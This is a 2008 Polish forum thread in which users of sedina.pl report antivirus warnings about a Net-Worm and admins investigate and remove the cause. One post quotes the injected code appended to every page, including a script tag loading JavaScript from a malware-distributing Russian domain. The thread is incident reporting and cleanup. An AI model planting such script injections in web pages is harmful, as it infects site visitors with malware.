wirus w kodzie sediny?

Informacje dotyczące działania portalu i forum, propozycje i sugestie zmian, sprawy techniczne, zauważone błędy.
Awatar użytkownika
bronx
Posty: 802
Rejestracja: 5 sty 2005, o 00:56
Lokalizacja: Neustettin
Kontakt:

wirus w kodzie sediny?

Postautor: bronx » 28 lip 2008, o 17:07

pytanko techniczne mam, od dzisiaj od mniej więcej godziny 17 co odswiezenie strony sedina.pl nie tylko głownej dostaje komunika z mojego firmowego F-secure że wirus Net-Worm próbuje się dostać na kompa.

Moze ktoś z adm, to sprawdzić? bo tylko na sedina.pl mam ten komunikat. W domu jeszcze nie sprawdzałem. Ko0munika wyskakuje i pod IE i pod Opera.
[url=http://www.szczecinek.org][img]http://www.szczecinek.org/HotLink/gruss_aus1.png[/img][/url]
Awatar użytkownika
bronx
Posty: 802
Rejestracja: 5 sty 2005, o 00:56
Lokalizacja: Neustettin
Kontakt:

Postautor: bronx » 28 lip 2008, o 17:11

znalazłem kawałek szkodliwego kodu z jakims podejrzanym javaskryptem

Kod: Zaznacz cały

<script src=http://www.iroe.ru/fgg.js></script></body>
</html><script type="text/javascript"><!--
document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://home.hit.stat.pl/_'+(new Date()).getTime()+'/script.js?id=d1BKVkryM_chZQ5xuw2D1rbvTKNk9oQF9jL_e5t.1qz.m7"></'+'scr'+'ipt>');
//--></script>
dokleja się na końcu kazdej strony, stronka iroe.ru jest rozsiewaczem wirusa.

Zadziałajcie coś z tym panowie.
[url=http://www.szczecinek.org][img]http://www.szczecinek.org/HotLink/gruss_aus1.png[/img][/url]
Awatar użytkownika
Bruce
Posty: 615
Rejestracja: 8 maja 2004, o 15:30
Lokalizacja: Grüne Schanze

Postautor: Bruce » 28 lip 2008, o 17:17

mam to samo , Avast wykrył
Awatar użytkownika
Bartosz
Expert
Posty: 8809
Rejestracja: 7 cze 2004, o 17:56
Lokalizacja: Stettin

Postautor: Bartosz » 28 lip 2008, o 18:08

Wirus: Net-Worm.JS.Aspxor.a

Wirus wykryty podczas wczytywania zawartości strony sieci Web.

Adres: www.iroe.ru

Wirus: Net-Worm.JS.Aspxor.a

Wirus wykryty podczas wczytywania zawartości strony sieci Web.

Adres: www.kj5s.ru
Erich-Falkenwaldergesellschaft
Awatar użytkownika
Piotrek
Posty: 1701
Rejestracja: 11 lip 2004, o 16:28
Lokalizacja: Szczecin

Postautor: Piotrek » 28 lip 2008, o 18:38

l powiadomiony sms-em. Będzie dopiero wieczorem więc wtedy coś zrobi.
Jeśli ktoś ma namiar na Kesona to można go powiadomić
Awatar użytkownika
keson
Admin
Posty: 844
Rejestracja: 12 maja 2004, o 10:21
Kontakt:

Postautor: keson » 28 lip 2008, o 22:16

kod jest usuniety od 19. co do zabezpieczen - na razie prowizorka: zmienilem nazwy plikow i odwolan, bo za wszystko odpowiada jakis automat. niestety, ciezko stwierdzic, jakie jest miejsce wejscia. dla zainteresowanych, pod http://sedina.pl/phpsecinfo/index.php mamy wszystkie ostrzezenia dotyczace zabezpieczenia samego php dostarczanego przez home'a. dziura jest jednak na jakies 90% w kodzie, gdzies zostala furtka do sqlinjection.

poczytamy, zobaczymy, moze cos sie znajdzie. w razie czego monitorujcie
Awatar użytkownika
Busol
Admin
Posty: 9625
Rejestracja: 21 kwie 2004, o 01:42
Lokalizacja: Szczecin
Kontakt:

Postautor: Busol » 28 lip 2008, o 23:56

Czy jeszcze widac wirusa ?
Szczegolnie przy logowaniu i wylogowaniu ?

Prosze o info...
Zapraszam na TrocheInaczej.pl.
"Niemcy kiedyś byli źli, a teraz są dobrzy. Ktoś mi tak opowiadał". Franek Bis.
Awatar użytkownika
Torney
Posty: 8630
Rejestracja: 16 wrz 2004, o 13:57

Postautor: Torney » 29 lip 2008, o 00:00

U mnie wciąż.
Erich-Falkenwaldergesellschaft
Awatar użytkownika
Zibsky
Posty: 2684
Rejestracja: 14 sty 2005, o 01:26

Postautor: Zibsky » 29 lip 2008, o 00:14

Wciaz
Awatar użytkownika
Busol
Admin
Posty: 9625
Rejestracja: 21 kwie 2004, o 01:42
Lokalizacja: Szczecin
Kontakt:

Postautor: Busol » 29 lip 2008, o 00:18

as poprosze jeszcze o przegladarke (w miare dokladny numerek) i program antywirusowy...

W kombinacji mojej i kesona brak komunikatow :)
Zapraszam na TrocheInaczej.pl.
"Niemcy kiedyś byli źli, a teraz są dobrzy. Ktoś mi tak opowiadał". Franek Bis.
Awatar użytkownika
Zibsky
Posty: 2684
Rejestracja: 14 sty 2005, o 01:26

Postautor: Zibsky » 29 lip 2008, o 00:20

IE, Norton
Awatar użytkownika
bronx
Posty: 802
Rejestracja: 5 sty 2005, o 00:56
Lokalizacja: Neustettin
Kontakt:

Postautor: bronx » 29 lip 2008, o 01:08

u mnie na dwoch kompach nic sie juz nie dzieje.

opera+avast
opera+arcavir2007
[url=http://www.szczecinek.org][img]http://www.szczecinek.org/HotLink/gruss_aus1.png[/img][/url]
Awatar użytkownika
Bartosz
Expert
Posty: 8809
Rejestracja: 7 cze 2004, o 17:56
Lokalizacja: Stettin

Postautor: Bartosz » 29 lip 2008, o 01:10

Wciąż (IE 7, AVK).
Erich-Falkenwaldergesellschaft
Awatar użytkownika
Jan_Krzysztof
Posty: 1248
Rejestracja: 11 lip 2004, o 01:55

Postautor: Jan_Krzysztof » 29 lip 2008, o 01:15

Wciąż atakuje trojan (Firefox, Avast).
Awatar użytkownika
Torney
Posty: 8630
Rejestracja: 16 wrz 2004, o 13:57

Postautor: Torney » 29 lip 2008, o 07:59

Mozilla Firefox 2.0.0.16, avast.
Erich-Falkenwaldergesellschaft

Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 1 gość

cron